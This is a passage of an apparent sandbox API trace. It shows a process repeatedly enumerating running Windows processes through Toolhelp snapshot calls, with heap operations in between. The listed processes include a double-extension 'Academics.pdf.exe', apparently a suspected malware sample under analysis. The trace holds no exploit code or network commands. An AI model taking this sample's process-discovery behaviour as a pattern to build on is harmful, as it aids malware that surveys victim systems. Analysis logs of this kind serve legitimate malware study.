th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0318.489] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0318.490] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0318.491] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0318.492] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0318.493] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0318.493] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0318.494] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0318.495] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.496] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.497] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.497] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.498] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.499] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0318.500] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.500] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.501] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0318.502] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0318.503] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0318.503] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0318.504] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.505] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0318.506] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0318.507] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0318.507] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0318.508] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0318.509] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0318.510] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0318.510] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0318.511] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0318.512] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0318.513] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0318.513] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0318.514] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0318.515] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0318.516] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0318.516] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0318.517] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0318.518] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0318.519] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0318.520] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.520] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0318.521] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.522] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0318.523] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0318.524] CloseHandle (hObject=0x294) returned 1 [0318.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0318.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0318.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0318.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0318.524] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0318.524] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0318.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0318.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0318.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0318.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0318.524] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0318.526] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0318.527] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0318.528] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0318.528] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0318.529] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0318.530] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0318.531] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0318.531] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0318.532] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0318.533] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0318.534] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.535] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.535] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.536] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.537] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.538] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0318.538] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.539] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.540] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0318.541] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0318.541] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0318.542] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0318.543] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.544] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0318.544] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0318.545] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0318.546] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0318.547] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0318.548] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0318.548] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0318.549] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0318.550] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0318.551] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0318.551] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) 